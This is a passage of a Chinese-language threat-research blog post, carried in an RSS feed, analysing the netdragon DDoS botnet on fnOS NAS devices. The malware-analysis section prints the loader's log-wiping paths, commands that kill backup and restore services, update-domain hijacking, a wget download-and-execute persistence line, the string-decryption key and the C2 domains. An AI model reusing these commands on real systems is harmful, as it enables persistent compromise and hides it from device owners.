<p>&#x8FD1;&#x671F;&#xFF0C;&#x98DE;&#x725B;&#xFF08;fnOS&#xFF09;&#x7F51;&#x7EDC;&#x9644;&#x52A0;&#x5B58;&#x50A8;&#x8BBE;&#x5907;&#xFF08;NAS&#xFF09;&#x66DD;&#x51FA;&#x5927;&#x89C4;&#x6A21;&#x906D;&#x5165;&#x4FB5;&#x5E76;&#x611F;&#x67D3;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x7684;&#x5B89;&#x5168;&#x4E8B;&#x4EF6;&#x3002;&#x653B;&#x51FB;&#x8005;&#x7591;&#x4F3C;&#x5229;&#x7528;&#x98DE;</p>]]></description><link>https://blog.xlab.qianxin.com/netdragon/</link><guid isPermaLink="false">69831cd9f39f9e0001b24ca6</guid><category><![CDATA[Botnet]]></category><category><![CDATA[DDoS]]></category><category><![CDATA[CN]]></category><category><![CDATA[Backdoor]]></category><dc:creator><![CDATA[Wang Hao]]></dc:creator><pubDate>Thu, 12 Feb 2026 03:29:20 GMT</pubDate><content:encoded><![CDATA[<h1 id="%E8%83%8C%E6%99%AF">&#x80CC;&#x666F;</h1>
<p>&#x8FD1;&#x671F;&#xFF0C;&#x98DE;&#x725B;&#xFF08;fnOS&#xFF09;&#x7F51;&#x7EDC;&#x9644;&#x52A0;&#x5B58;&#x50A8;&#x8BBE;&#x5907;&#xFF08;NAS&#xFF09;&#x66DD;&#x51FA;&#x5927;&#x89C4;&#x6A21;&#x906D;&#x5165;&#x4FB5;&#x5E76;&#x611F;&#x67D3;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x7684;&#x5B89;&#x5168;&#x4E8B;&#x4EF6;&#x3002;&#x653B;&#x51FB;&#x8005;&#x7591;&#x4F3C;&#x5229;&#x7528;&#x98DE;&#x725B; NAS &#x7CFB;&#x7EDF;&#x4E2D;&#x5C1A;&#x672A;&#x516C;&#x5F00;&#x7684;&#x5B89;&#x5168;&#x6F0F;&#x6D1E;&#xFF0C;&#x5728;&#x8BBE;&#x5907;&#x5BF9;&#x5916;&#x66B4;&#x9732;&#x76F8;&#x5173;&#x670D;&#x52A1;&#x7684;&#x60C5;&#x51B5;&#x4E0B;&#x6210;&#x529F;&#x690D;&#x5165;&#x6076;&#x610F;&#x7A0B;&#x5E8F;&#x3002;&#x901A;&#x8FC7;&#x5BF9;&#x5DF2;&#x6355;&#x83B7;&#x5E76;&#x5206;&#x6790;&#x7684;&#x6076;&#x610F;&#x6837;&#x672C;&#x8FDB;&#x884C;&#x7814;&#x5224;&#xFF0C;&#x6211;&#x4EEC;&#x786E;&#x8BA4;&#x5176;&#x96B6;&#x5C5E;&#x4E8E; netdragon &#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x5BB6;&#x65CF;&#x3002;&#x8BE5;&#x5BB6;&#x65CF;&#x6700;&#x65E9;&#x4E8E; 2024 &#x5E74; 10 &#x6708;&#x88AB;&#x6211;&#x4EEC;&#x53D1;&#x73B0;&#x5E76;&#x6301;&#x7EED;&#x8DDF;&#x8E2A;&#x81F3;&#x4ECA;&#xFF0C;&#x5176;&#x6838;&#x5FC3;&#x80FD;&#x529B;&#x5305;&#x62EC; DDoS &#x653B;&#x51FB;&#x4E0E;&#x8FDC;&#x7A0B;&#x547D;&#x4EE4;&#x6267;&#x884C;&#xFF0C;&#x53EF;&#x5C06;&#x88AB;&#x611F;&#x67D3;&#x7684; NAS &#x8BBE;&#x5907;&#x7EB3;&#x5165;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#xFF0C;&#x53C2;&#x4E0E;&#x5927;&#x89C4;&#x6A21;&#x5206;&#x5E03;&#x5F0F;&#x62D2;&#x7EDD;&#x670D;&#x52A1;&#x653B;&#x51FB;&#x6D3B;&#x52A8;&#x3002;</p>
<p>&#x503C;&#x5F97;&#x6CE8;&#x610F;&#x7684;&#x662F;&#xFF0C;Netdragon &#x5728;&#x5176;&#x5165;&#x4FB5;&#x884C;&#x4E3A;&#x9010;&#x6B65;&#x66B4;&#x9732;&#x540E;&#xFF0C;&#x6301;&#x7EED;&#x5BF9;&#x6837;&#x672C;&#x7684;&#x5BF9;&#x6297;&#x80FD;&#x529B;&#x8FDB;&#x884C;&#x5347;&#x7EA7;&#xFF0C;&#x901A;&#x8FC7;&#x591A;&#x5C42;&#x624B;&#x6BB5;&#x524A;&#x5F31;&#x9632;&#x5FA1;&#x4E0E;&#x6E05;&#x9664;&#x6548;&#x679C;&#x3002;&#x5728;&#x7F51;&#x7EDC;&#x5C42;&#x9762;&#xFF0C;&#x6837;&#x672C;&#x4F1A;&#x4E3B;&#x52A8;&#x5220;&#x9664;&#x7CFB;&#x7EDF;&#x4E2D;&#x7528;&#x4E8E;&#x963B;&#x65AD; C2 &#x901A;&#x4FE1;&#x7684; iptables / nft&#x89C4;&#x5219;&#xFF0C;&#x7ED5;&#x8FC7;&#x65E2;&#x6709;&#x5C01;&#x5835;&#x63AA;&#x65BD;&#xFF1B;&#x540C;&#x65F6;&#x7BE1;&#x6539; hosts &#x6587;&#x4EF6;&#xFF0C;&#x5BF9;&#x98DE;&#x725B; NAS &#x5B98;&#x65B9;&#x5347;&#x7EA7;&#x57DF;&#x540D;&#x8FDB;&#x884C;&#x52AB;&#x6301;&#xFF0C;&#x4ECE;&#x800C;&#x963B;&#x65AD;&#x8BBE;&#x5907;&#x83B7;&#x53D6;&#x7CFB;&#x7EDF;&#x66F4;&#x65B0;&#x548C;&#x5B89;&#x5168;&#x8865;&#x4E01;&#x3002;</p>
<p>&#x5728;&#x6301;&#x4E45;&#x5316;&#x65B9;&#x9762;&#xFF0C;Netdragon &#x540C;&#x65F6;&#x5F15;&#x5165; systemd &#x670D;&#x52A1;&#x4E0E;&#x5185;&#x6838;&#x6A21;&#x5757;&#xFF0C;&#x6784;&#x5EFA;&#x7528;&#x6237;&#x6001;&#x4E0E;&#x5185;&#x6838;&#x6001;&#x7684;&#x53CC;&#x91CD;&#x6301;&#x4E45;&#x5316;&#x673A;&#x5236;&#xFF0C;&#x663E;&#x8457;&#x63D0;&#x5347;&#x6837;&#x672C;&#x5728;&#x8BBE;&#x5907;&#x4E0A;&#x7684;&#x5B58;&#x6D3B;&#x80FD;&#x529B;&#xFF1B;&#x800C;&#x5728;&#x4EE3;&#x7801;&#x5C42;&#x9762;&#xFF0C;&#x5219;&#x901A;&#x8FC7;&#x52A8;&#x6001;&#x5BC6;&#x94A5;&#x52A0;&#x58F3;&#x7B49;&#x65B9;&#x5F0F;&#x589E;&#x52A0;&#x9006;&#x5411;&#x5206;&#x6790;&#x4E0E;&#x7B7E;&#x540D;&#x68C0;&#x6D4B;&#x7684;&#x96BE;&#x5EA6;&#x3002;&#x4E0A;&#x8FF0;&#x591A;&#x79CD;&#x5BF9;&#x6297;&#x624B;&#x6BB5;&#x534F;&#x540C;&#x4F5C;&#x7528;&#xFF0C;&#x4F7F;&#x53D7;&#x611F;&#x67D3;&#x8BBE;&#x5907;&#x96BE;&#x4EE5;&#x88AB;&#x5F7B;&#x5E95;&#x6E05;&#x9664;&#xFF0C;&#x663E;&#x8457;&#x62AC;&#x9AD8;&#x4E86;&#x9632;&#x5FA1;&#x3001;&#x6EAF;&#x6E90;&#x4E0E;&#x5E94;&#x6025;&#x54CD;&#x5E94;&#x6210;&#x672C;&#x3002;</p>
<p>&#x53D7;&#x8FD9;&#x4E9B;&#x5BF9;&#x6297;&#x884C;&#x4E3A;&#x5F71;&#x54CD;&#xFF0C;&#x90E8;&#x5206;&#x53D7;&#x5BB3;&#x8BBE;&#x5907;&#x7684;&#x7CFB;&#x7EDF;&#x5347;&#x7EA7;&#x673A;&#x5236;&#x88AB;&#x76F4;&#x63A5;&#x7834;&#x574F;&#xFF0C;<a href="https://club.fnnas.com/forum.php?mod=viewthread&amp;tid=53831&amp;extra=page%3D1&amp;ref=blog.xlab.qianxin.com">&#x8868;&#x73B0;&#x4E3A;&#x65E0;&#x6CD5;&#x6B63;&#x5E38;&#x5B8C;&#x6210;&#x7CFB;&#x7EDF;&#x5347;&#x7EA7;&#x6216;&#x5B89;&#x88C5;&#x5B98;&#x65B9;&#x5B89;&#x5168;&#x8865;&#x4E01;</a>)&#x3002;&#x8BE5;&#x95EE;&#x9898;&#x8FDB;&#x4E00;&#x6B65;&#x5BFC;&#x81F4;&#x8BBE;&#x5907;&#x957F;&#x671F;&#x5904;&#x4E8E;&#x53D7;&#x611F;&#x67D3;&#x72B6;&#x6001;&#xFF0C;&#x5B89;&#x5168;&#x98CE;&#x9669;&#x88AB;&#x6301;&#x7EED;&#x653E;&#x5927;&#x3002;</p>
<p>&#x53D7;&#x9650;&#x4E8E;&#x5F53;&#x524D;&#x53EF;&#x83B7;&#x53D6;&#x7684;&#x6570;&#x636E;&#xFF0C;&#x6211;&#x4EEC;&#x5C1A;&#x65E0;&#x6CD5;&#x5B8C;&#x6574;&#x8FD8;&#x539F;&#x98DE;&#x725B; NAS &#x88AB;&#x5165;&#x4FB5;&#x7684;&#x5177;&#x4F53;&#x653B;&#x51FB;&#x8DEF;&#x5F84;&#x53CA;&#x6F0F;&#x6D1E;&#x7EC6;&#x8282;&#xFF0C;&#x76F8;&#x5173;&#x5185;&#x5BB9;&#x6682;&#x4E0D;&#x5C55;&#x5F00;&#x8BA8;&#x8BBA;&#x3002;&#x672C;&#x6587;&#x5C06;&#x91CD;&#x70B9;&#x56F4;&#x7ED5;&#x6076;&#x610F;&#x6837;&#x672C;&#x884C;&#x4E3A;&#x5206;&#x6790;&#x3001;&#x611F;&#x67D3;&#x89C4;&#x6A21;&#x8BC4;&#x4F30;&#x4EE5;&#x53CA; DDoS &#x653B;&#x51FB;&#x6D3B;&#x52A8;&#x7279;&#x5F81;&#x7B49;&#x65B9;&#x9762;&#xFF0C;&#x5206;&#x4EAB;&#x6211;&#x4EEC;&#x9636;&#x6BB5;&#x6027;&#x7684;&#x7814;&#x7A76;&#x7ED3;&#x8BBA;&#x3002;</p>
<h1 id="%E6%84%9F%E6%9F%93%E6%83%85%E5%86%B5%E5%88%86%E6%9E%90">&#x611F;&#x67D3;&#x60C5;&#x51B5;&#x5206;&#x6790;</h1>
<p>&#x7ECF;&#x8FC7;&#x5BF9;&#x6837;&#x672C;&#x529F;&#x80FD;&#x7684;&#x6DF1;&#x5165;&#x5206;&#x6790;&#xFF0C;&#x6211;&#x4EEC;&#x786E;&#x8BA4;<code>netdragon</code>&#x4F1A;&#x5728;&#x53D7;&#x5BB3;&#x8BBE;&#x5907;&#x4E0A;&#x5F00;&#x542F;&#x4E00;&#x4E2A; http &#x540E;&#x95E8;&#x63A5;&#x53E3;&#xFF0C;&#x653B;&#x51FB;&#x8005;&#x53EF;&#x901A;&#x8FC7;&#x8BE5;&#x63A5;&#x53E3;&#x5BF9;&#x88AB;&#x611F;&#x67D3;&#x8BBE;&#x5907;&#x5B9E;&#x65BD;&#x8FDC;&#x7A0B;&#x8BBF;&#x95EE;&#x4E0E;&#x63A7;&#x5236;&#x3002;</p>
<p>&#x57FA;&#x4E8E;&#x8BE5;&#x540E;&#x95E8;&#x7684;&#x901A;&#x4FE1;&#x7279;&#x5F81;&#xFF0C;&#x5E76;&#x7ED3;&#x5408; XLAB &#x5168;&#x7403;&#x9E70;&#x8D44;&#x4EA7;&#x6D4B;&#x7ED8;&#x80FD;&#x529B; &#x8FDB;&#x884C;&#x6392;&#x67E5;&#xFF0C;&#x6211;&#x4EEC;&#x5171;&#x53D1;&#x73B0; 1000 &#x4F59;&#x4E2A;&#x5B58;&#x5728;&#x611F;&#x67D3;&#x8FF9;&#x8C61;&#x7684; IP &#x5730;&#x5740;&#x3002;&#x5206;&#x6790;&#x7ED3;&#x679C;&#x8868;&#x660E;&#xFF0C;&#x8FD9;&#x4E9B; IP &#x5747;&#x5BF9;&#x5E94; &#x98DE;&#x725B;&#x8BBE;&#x5907;&#xFF0C;&#x76EE;&#x524D;&#x5C1A;&#x672A;&#x53D1;&#x73B0;&#x5176;&#x4ED6;&#x7C7B;&#x578B;&#x8BBE;&#x5907;&#x53D7;&#x5230;&#x5F71;&#x54CD;&#x3002;</p>
<figure>
  <img src="https://blog.xlab.qianxin.com/content/images/2026/02/adsf1adfadf2026-02-04-18.32.43.png" alt="hunter_census">
  <figcaption>&#x5168;&#x7403;&#x9E70;&#x8D44;&#x4EA7;&#x6D4B;&#x7ED8;</figcaption>
</figure>
<p>&#x6B64;&#x5916;&#xFF0C;&#x4ECE; XLAB &#x4F34;&#x968F;&#x57DF;&#x540D;&#x6570;&#x636E; &#x4E2D;&#x4E5F;&#x53EF;&#x4EE5;&#x8FDB;&#x4E00;&#x6B65;&#x4F50;&#x8BC1;&#x4E0A;&#x8FF0;&#x7ED3;&#x8BBA;&#x3002;&#x5982;&#x4E0B;&#x56FE;&#x6240;&#x793A;&#xFF0C;<code>xd.killaurasleep[.]top</code> &#x4E3A; <code>netdragon</code> &#x4E0B;&#x8F7D;&#x6837;&#x672C;&#x6240;&#x4F7F;&#x7528;&#x7684;&#x57DF;&#x540D;&#xFF0C;&#x8BE5;&#x57DF;&#x540D;&#x5728;&#x88AB;&#x52A8; DNS &#x8BB0;&#x5F55;&#x4E2D;&#x4E0E;&#x591A;&#x4E2A;&#x98DE;&#x725B;&#x76F8;&#x5173;&#x57DF;&#x540D;&#x5B58;&#x5728;&#x660E;&#x663E;&#x7684;&#x4F34;&#x968F;&#x5173;&#x7CFB;&#xFF0C;&#x8868;&#x660E;&#x88AB;&#x611F;&#x67D3;&#x8BBE;&#x5907;&#x53EF;&#x80FD;&#x4E3B;&#x8981;&#x96C6;&#x4E2D;&#x4E8E;&#x98DE;&#x725B;&#x751F;&#x6001;&#x3002;</p>
<figure>
  <img src="https://blog.xlab.qianxin.com/content/images/2026/02/Snip20260205_2.png" alt="xlab codomain">
  <figcaption>XLAB&#x4F34;&#x968F;&#x57DF;&#x540D;</figcaption>
</figure>
<p>&#x611F;&#x67D3;&#x89C4;&#x6A21;&#x65B9;&#x9762;&#xFF0C;&#x7ED3;&#x5408;XLAB&#x5168;&#x7403;&#x9E70;&#x8D44;&#x4EA7;&#x6D4B;&#x7ED8;&#x548C;&#x6211;&#x4EEC;&#x638C;&#x63E1;&#x7684;C2&#x63A7;&#x5236;&#x7AEF;&#x6570;&#x636E;&#x770B;&#x3002;<code>netdragon</code>&#x50F5;&#x5C38;&#x7F51;&#x7EDC;1&#x6708;&#x5E95;&#x611F;&#x67D3;&#x7684;&#x8BBE;&#x5907;&#x53EF;&#x80FD;&#x5728;1500&#x53F0;&#x5DE6;&#x53F3;&#x3002;</p>
<figure>
  <img src="https://blog.xlab.qianxin.com/content/images/2026/02/asdfa1231232026-02-04-18.22.55.png" alt="netdragon cnc">
  <figcaption>netdragon&#x63A7;&#x5236;&#x7AEF;&#x622A;&#x56FE;&#x663E;&#x793A;&#x5728;&#x7EBF;&#x8BBE;&#x5907;1143&#x53F0;</figcaption>
</figure>
<h1 id="ddos%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90">DDoS&#x653B;&#x51FB;&#x5206;&#x6790;</h1>
<p>&#x6211;&#x4EEC;&#x81EA; 2024 &#x5E74; 10 &#x6708;&#x8D77;&#x6301;&#x7EED;&#x76D1;&#x63A7;&#x4E0E; <code>netdragon</code> &#x76F8;&#x5173;&#x7684; DDoS &#x653B;&#x51FB;&#x6D3B;&#x52A8;&#x3002;&#x5206;&#x6790;&#x663E;&#x793A;&#xFF0C;<code>netdragon</code> &#x4E3B;&#x8981;&#x901A;&#x8FC7; Telegram Bot&#x3001;HTTP API &#x7B49;&#x6E20;&#x9053;&#x63A5;&#x6536;&#x653B;&#x51FB;&#x6307;&#x4EE4;&#xFF0C;&#x5E76;&#x636E;&#x6B64;&#x53D1;&#x8D77;&#x5206;&#x5E03;&#x5F0F;&#x62D2;&#x7EDD;&#x670D;&#x52A1;&#xFF08;DDoS&#xFF09;&#x653B;&#x51FB;&#x3002;</p>
<p>&#x76D1;&#x63A7;&#x7ED3;&#x679C;&#x8868;&#x660E;&#xFF0C;<code>netdragon</code> &#x7684;&#x653B;&#x51FB;&#x884C;&#x4E3A;&#x4E0D;&#x5177;&#x5907;&#x660E;&#x663E;&#x7684;&#x5B9A;&#x5411;&#x6027;&#xFF0C;&#x653B;&#x51FB;&#x76EE;&#x6807;&#x5206;&#x5E03;&#x8303;&#x56F4;&#x8F83;&#x5E7F;&#xFF0C;&#x4E3B;&#x8981;&#x6D89;&#x53CA;&#x4E2D;&#x56FD;&#x3001;&#x7F8E;&#x56FD;&#x3001;&#x65B0;&#x52A0;&#x5761;&#x3001;&#x6FB3;&#x5927;&#x5229;&#x4E9A;&#x7B49;&#x5730;&#x533A;&#x3002;&#x53D7;&#x5F71;&#x54CD;&#x5BF9;&#x8C61;&#x6DB5;&#x76D6;&#x4FE1;&#x606F;&#x4F20;&#x8F93;&#x3001;&#x8F6F;&#x4EF6;&#x4E0E;&#x4FE1;&#x606F;&#x6280;&#x672F;&#x670D;&#x52A1;&#x3001;&#x5236;&#x9020;&#x4E1A;&#xFF0C;&#x4EE5;&#x53CA;&#x516C;&#x5171;&#x7BA1;&#x7406;&#x3001;&#x793E;&#x4F1A;&#x4FDD;&#x969C;&#x548C;&#x793E;&#x4F1A;&#x7EC4;&#x7EC7;&#x7B49;&#x591A;&#x4E2A;&#x884C;&#x4E1A;&#x9886;&#x57DF;&#x3002;</p>
<figure>
  <img src="https://blog.xlab.qianxin.com/content/images/2026/02/asdf2334235adfjjla2026-02-04-18.43.36.png" alt="netdragon attack incident">
  <figcaption>netdragon&#x653B;&#x51FB;&#x4E8B;&#x4EF6;&#x8D8B;&#x52BF;</figcaption>
</figure>
<p>&#x53E6;&#x5916;&#x6211;&#x4EEC;&#x8FD8;&#x89C2;&#x5BDF;&#x5230;2&#x6708;1&#x65E5;&#x591C;&#x665A;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x4F5C;&#x8005;&#x5411;&#x6240;&#x6709;BOT&#x53D1;&#x51FA;&#x4E86;&#x4E00;&#x6761;&#x5220;&#x9664;&#x6587;&#x4EF6;&#x6307;&#x4EE4;&#x3001;&#x5220;&#x9664;&#x98DE;&#x725B;NAS&#x8BBE;&#x5907;&#x4E0A;&#x7684;&#x4E00;&#x4E2A;&#x79C1;&#x94A5;&#x6587;&#x4EF6;<code>rsa_private_key.pem</code>&#x3002;&#x6211;&#x4EEC;&#x4E0D;&#x786E;&#x5B9A;&#x5220;&#x9664;&#x8FD9;&#x4E2A;&#x6587;&#x4EF6;&#x7684;&#x76EE;&#x7684;&#x662F;&#x4EC0;&#x4E48;&#xFF0C;&#x4F46;&#x662F;&#x5220;&#x9664;&#x79C1;&#x94A5;&#x6587;&#x4EF6;&#x8FD9;&#x79CD;&#x64CD;&#x4F5C;&#x770B;&#x7740;&#x5C31;&#x5F88;&#x5371;&#x9669;&#x3002;<br>
<img src="https://blog.xlab.qianxin.com/content/images/2026/02/--2026-02-05-16.42.01.png" alt="&#x622A;&#x5C4F;2026-02-05 16.42.01.png" loading="lazy"></p>
<h1 id="%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90">&#x6837;&#x672C;&#x5206;&#x6790;</h1>
<p>&#x901A;&#x8FC7;&#x6211;&#x4EEC;&#x8DDF;&#x8E2A;&#x7CFB;&#x7EDF;&#x957F;&#x671F;&#x76D1;&#x6D4B;&#xFF0C;&#x5DF2;&#x6355;&#x83B7;&#x5230;&#x8BE5;&#x6076;&#x610F;&#x5BB6;&#x65CF;&#x7684;&#x591A;&#x4E2A;&#x53D8;&#x79CD;&#x6837;&#x672C;&#x3002;&#x7EFC;&#x5408;&#x5206;&#x6790;&#x53D1;&#x73B0;&#xFF0C;&#x8BE5;&#x5BB6;&#x65CF;&#x6837;&#x672C;&#x6574;&#x4F53;&#x91C7;&#x7528;&#x6A21;&#x5757;&#x5316;&#x8BBE;&#x8BA1;&#xFF0C;&#x4E3B;&#x8981;&#x7531; Loader &#x7EC4;&#x4EF6; &#x548C; DDoS &#x7EC4;&#x4EF6; &#x4E24;&#x4E2A;&#x6838;&#x5FC3;&#x90E8;&#x5206;&#x6784;&#x6210;&#x3002;&#x5176;&#x4E2D;&#xFF0C;Loader &#x7EC4;&#x4EF6;&#x8D1F;&#x8D23;&#x5728;&#x53D7;&#x5BB3;&#x8BBE;&#x5907;&#x4E0A;&#x5B8C;&#x6210;&#x521D;&#x59CB;&#x52A0;&#x8F7D;&#x3001;&#x73AF;&#x5883;&#x63A2;&#x6D4B;&#x53CA;&#x540E;&#x7EED;&#x529F;&#x80FD;&#x6A21;&#x5757;&#x7684;&#x6295;&#x9012;&#xFF0C;&#x800C; DDoS &#x7EC4;&#x4EF6;&#x5219;&#x7528;&#x4E8E;&#x6267;&#x884C;&#x5177;&#x4F53;&#x7684;&#x653B;&#x51FB;&#x6307;&#x4EE4;&#x3002;&#x6700;&#x65B0;&#x6837;&#x672C;&#x5728;&#x8FD0;&#x884C;&#x8FC7;&#x7A0B;&#x4E2D;&#x5C55;&#x73B0;&#x51FA;&#x591A;&#x9879;&#x4E0E; fnOS &#x73AF;&#x5883;&#x9AD8;&#x5EA6;&#x76F8;&#x5173;&#x7684;&#x884C;&#x4E3A;&#x7279;&#x5F81;&#xFF0C;&#x5305;&#x62EC;&#x5BF9;&#x7CFB;&#x7EDF;&#x7ED3;&#x6784;&#x3001;&#x670D;&#x52A1;&#x914D;&#x7F6E;&#x53CA;&#x8FD0;&#x884C;&#x73AF;&#x5883;&#x7684;&#x9488;&#x5BF9;&#x6027;&#x9002;&#x914D;&#xFF0C;&#x8868;&#x660E;&#x8BE5;&#x6076;&#x610F;&#x5BB6;&#x65CF;&#x6700;&#x65B0;&#x7684;&#x6837;&#x672C;&#x5E76;&#x975E;&#x6CDB;&#x5316;&#x4F20;&#x64AD;&#xFF0C;&#x800C;&#x662F;&#x5BF9; fnOS &#x8BBE;&#x5907;&#x5177;&#x6709;&#x660E;&#x786E;&#x7684;&#x5B9A;&#x5411;&#x653B;&#x51FB;&#x610F;&#x56FE;&#x3002;</p>
<figure>
  <img src="https://blog.xlab.qianxin.com/content/images/2026/02/netdragon.download.cmd.png" alt="netdragon attack incident">
  <figcaption>XLAB&#x6355;&#x83B7;&#x7684;&#x90E8;&#x5206;&#x6837;&#x672C;&#x4E0B;&#x8F7D;&#x94FE;&#x63A5;</figcaption>
</figure>
<h2 id="loader%E7%BB%84%E4%BB%B6">Loader&#x7EC4;&#x4EF6;</h2>
<p>&#x8BE5;&#x7EC4;&#x4EF6;&#x4E3B;&#x8981;&#x5B8C;&#x6210;&#x75D5;&#x8FF9;&#x6E05;&#x7406;&#x3001;&#x6301;&#x4E45;&#x5316;&#x3001;&#x963B;&#x65AD;&#x66F4;&#x65B0;/&#x6062;&#x590D;&#x7684;&#x529F;&#x80FD;</p>
<h3 id="%E9%9A%90%E8%97%8F%E6%94%BB%E5%87%BB%E7%97%95%E8%BF%B9">&#x9690;&#x85CF;&#x653B;&#x51FB;&#x75D5;&#x8FF9;</h3>
<p>&#x6E05;&#x7A7A;&#x65E5;&#x5FD7;&#x76F8;&#x5173;&#x6587;&#x4EF6;&#x76EE;&#x5F55;&#xFF0C;&#x9690;&#x85CF;&#x653B;&#x51FB;&#x75D5;&#x8FF9;&#xFF0C;&#x76EE;&#x5F55;&#x53CA;&#x6587;&#x4EF6;&#x5982;&#x4E0B;&#xFF1A;</p>
<pre><code>/var/log/accountsrv/
/var/log/apps/
/var/log/apt/
/var/log/cloud_storage_dav/
/var/log/openvswitch/
/var/log/postgresql/
/var/log/trim_app_center/
/var/log/trim_license/
/var/log/trim_sac/
/var/log/trim_tfa/
/var/log/trim-connect/
/var/log/trim-sharelink/
/var/log/*.log
/usr/trim/logs/ai_manager/
/usr/trim/logs/*.log
/usr/trim/nginx/logs/
/var/log/secure
/var/log/secure.1
/var/log/secure-*
/var/log/secure.*.gz
/var/log/messages
/var/log/messages.1
/var/log/messages-*
/var/log/messages.*.gz
/run/log/journal/
/var/log/journal/
/var/log/wtmp
/var/log/btmp
/var/log/lastlog
/var/log/audit/audit.log
/var/log/audit/audit.log.*
</code></pre>
<h3 id="http%E5%90%8E%E9%97%A8">http&#x540E;&#x95E8;</h3>
<p>&#x76D1;&#x542C;&#x672C;&#x5730;&#x7AEF;&#x53E3;57132&#xFF0C;&#x5B9E;&#x73B0;http&#x540E;&#x95E8;&#xFF0C;&#x53EF;&#x6267;&#x884C;&#x4EFB;&#x610F;&#x6307;&#x4EE4;</p>
<pre><code>method: GET
path: /api
arg: log
</code></pre>
<p>&#x540E;&#x95E8;&#x901A;&#x8FC7;&#x89E3;&#x5BC6;&#x53C2;&#x6570;hex&#x5B57;&#x7B26;&#x4E32;&#x5F97;&#x5230;&#x8981;&#x6267;&#x884C;&#x7684;&#x6307;&#x4EE4;&#xFF0C;&#x82E5;&#x6267;&#x884C;&#x6210;&#x529F;&#x4F1A;&#x8FD4;&#x56DE;&quot;OK&quot;</p>
<h3 id="%E9%98%BB%E6%AD%A2%E6%9B%B4%E6%96%B0%E4%B8%8E%E6%81%A2%E5%A4%8D">&#x963B;&#x6B62;&#x66F4;&#x65B0;&#x4E0E;&#x6062;&#x590D;</h3>
<ol>
<li>&#x901A;&#x8FC7;&#x4FEE;&#x6539;hosts&#x52AB;&#x6301;&#x98DE;&#x725B;os&#x66F4;&#x65B0;&#x57DF;&#x540D;&#x5230;0.0.0.0</li>
</ol>
<pre><code>apiv2-liveupdate.fnnas.com
update-service.test.teiron-inc.cn
</code></pre>
<ol start="2">
<li>&#x5173;&#x95ED;&#x7528;&#x4E8E;&#x7CFB;&#x7EDF;&#x6062;&#x590D;&#x7684;&#x670D;&#x52A1;</li>
</ol>
<pre><code>pkill -f sysrestore_service
pkill -f backup_service
</code></pre>
<ol start="3">
<li>&#x5220;&#x9664;&#x66F4;&#x65B0;/&#x6062;&#x590D;&#x76F8;&#x5173;&#x6587;&#x4EF6;</li>
</ol>
<pre><code>/tmp/trim-update
/tmp/appcenter
chattr
liveupdate
backup_local
backup_remote
backup_cloud
backup_service
findmnt
</code></pre>
<h3 id="%E6%8C%81%E4%B9%85%E5%8C%96">&#x6301;&#x4E45;&#x5316;</h3>
<p>&#x4E0B;&#x8F7D;&#x4E0B;&#x4E00;&#x9636;&#x6BB5;&#x7EC4;&#x4EF6;&#x5E76;&#x6301;&#x4E45;&#x5316;</p>
<p>&#x5728;system_startup.sh&#x540E;&#x8FFD;&#x52A0;</p>
<pre><code>wget http://151.240.*.*/turmp -O /tmp/turmp ; chmod 777 /tmp/turmp ; /tmp/turmp
</code></pre>
<h2 id="ddos%E7%BB%84%E4%BB%B6">DDoS&#x7EC4;&#x4EF6;</h2>
<p>&#x8BE5;&#x7EC4;&#x4EF6;&#x4E3B;&#x8981;&#x7528;&#x4E8E;DDoS&#xFF0C;&#x540C;&#x65F6;&#x652F;&#x6301;&#x4EFB;&#x610F;&#x6307;&#x4EE4;&#x6267;&#x884C;&#x548C;&#x6301;&#x4E45;&#x5316;</p>
<h3 id="%E5%AD%97%E7%AC%A6%E4%B8%B2%E8%A7%A3%E5%AF%86">&#x5B57;&#x7B26;&#x4E32;&#x89E3;&#x5BC6;</h3>
<p>&#x4F7F;&#x7528;chacha20&#x89E3;&#x5BC6;&#x5B57;&#x7B26;&#x4E32;&#x8868;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/02/str_decode.png" alt="str_decode.png" loading="lazy"></p>
<p>key&#x548C;nonce&#x786C;&#x7F16;&#x7801;&#x5728;&#x6837;&#x672C;&#x4E2D;</p>
<pre><code>KEY_HEX:
161E194B111F001D041C0E080B1A110705080D0F060A15010C141F1702031318

NONCE_HEX:
1E002A0000036E0000070106
</code></pre>
<p>&#x89E3;&#x5BC6;&#x51FA;&#x7684;&#x5B57;&#x7B26;&#x4E32;&#x8868;&#x5982;&#x4E0B;&#xFF1A;</p>
<pre><code>PWNED FROM NETDRAG
sshd
/ngday
x86
/dev
/tmp
aura.kabot.icu
xd.bmlkda.icu
/etc/hosts
/etc/machine-id
/proc/sys/kernel/random/boot_id
</code></pre>
<p>&#x9488;&#x5BF9;&#x51E0;&#x4E2A;&#x91CD;&#x70B9;&#x5B57;&#x7B26;&#x4E32;&#x7684;&#x8BF4;&#x660E;&#xFF1A;</p>
<ol>
<li>&#x6210;&#x529F;&#x8FD0;&#x884C;&#x540E;&#x4F1A;&#x8F93;&#x51FA;<code>PWNED FROM NETDRAG</code></li>
<li>&#x4FEE;&#x6539;&#x8FDB;&#x7A0B;&#x540D;&#x4E3A;<code>sshd</code></li>
<li>&#x5728;&#x672C;&#x5730;&#x76D1;&#x542C;&#x7AEF;&#x53E3;(&#x4E0D;&#x56FA;&#x5B9A;&#xFF0C;&#x6839;&#x636E;&#x672C;&#x5730;&#x5730;&#x5740;&#x751F;&#x6210;)&#xFF0C;&#x5F53;&#x8BFB;&#x53D6;&#x5230;<code>/ngday</code>&#x65F6;&#x9000;&#x51FA;&#xFF0C;&#x786E;&#x4FDD;&#x5355;&#x4E00;&#x5B9E;&#x4F8B;&#x8FD0;&#x884C;</li>
</ol>
<h3 id="%E9%9A%90%E8%97%8F%E8%87%AA%E8%BA%AB">&#x9690;&#x85CF;&#x81EA;&#x8EAB;</h3>
<p>&#x6210;&#x529F;&#x8FD0;&#x884C;&#x540E;&#x4F1A;&#x5220;&#x9664;&#x81EA;&#x8EAB;&#x6587;&#x4EF6;</p>
